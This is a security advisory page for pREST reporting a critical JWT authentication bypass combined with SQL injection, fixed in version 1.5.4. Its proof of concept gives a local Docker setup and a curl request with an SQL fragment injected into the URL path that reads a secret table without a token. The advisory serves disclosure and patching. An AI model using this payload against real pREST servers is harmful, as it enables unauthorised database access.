GHSA-wm25-j4gw-6vr3

Suggest an improvement
Source
https://github.com/advisories/GHSA-wm25-j4gw-6vr3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm25-j4gw-6vr3/GHSA-wm25-j4gw-6vr3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-wm25-j4gw-6vr3
Aliases
Published
2024-07-30T15:04:26Z
Modified
2024-08-07T14:16:28Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
pREST vulnerable to jwt bypass + sql injection
Details

Summary

Probably jwt bypass + sql injection or what i'm doing wrong?

PoC (how to reproduce)

  1. Create following files:

docker-compose.yml:

services:
  postgres:
    image: postgres
    container_name: postgres_container_mre
    environment:
      POSTGRES_USER: test_user_pg
      POSTGRES_PASSWORD: test_pass_pg
      POSTGRES_DB: test_db
  prest:
    image: prest/prest
    build: .
    volumes:
      - ./queries:/queries
      - ./migrations:/migrations
    ports:
      - "3000:3000"

Dockerfile:

from prest/prest:latest

COPY ./prest.toml prest.toml

prest.toml:

debug=false
migrations = "./migrations"

[http]
port = 3000

[jwt]
default = true
key = "secret"
algo = "HS256"

[auth]
enabled = true
type = "body"
encrypt = "MD5"
table = "prest_users"
username = "username"
password = "password"

[pg]
URL = "postgresql://test_user_pg:test_pass_pg@postgres:5432/test_db/?sslmode=disable"

[ssl]
mode = "disable"
sslcert = "./PATH"
sslkey = "./PATH"
sslrootcert = "./PATH"

[expose]
enabled = true
databases = true
schemas = true
tables = true

[queries]
location = "/queries"

  1. run commands:

    mkdir -p migrations queries
docker compose up --build -d

    wait for pg and prest, then run following to add test data to the pg:

    export PGPASSWORD=test_pass_pg
docker exec -it postgres_container_mre psql -U test_user_pg -d test_db -c "CREATE TABLE IF NOT EXISTS public.some_table (id int primary key, secret_data text);\
INSERT INTO public.some_table (id, secret_data) VALUES (1, 'some secret text') ON CONFLICT DO NOTHING;"

  2. SQL injection even without jwt token:

    curl --location '127.0.0.1:3000/test_db/public".some_table)%20s;--/auth'

    output:

    [{"id": 1, "secret_data": "some secret text"}]
Database specific 
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-287",
        "CWE-89"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-30T15:04:26Z"
}
References

Affected packages

Go / github.com/prest/prest

Package

Name
github.com/prest/prest
View open source insights on deps.dev
Purl
pkg:golang/github.com/prest/prest

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.5.4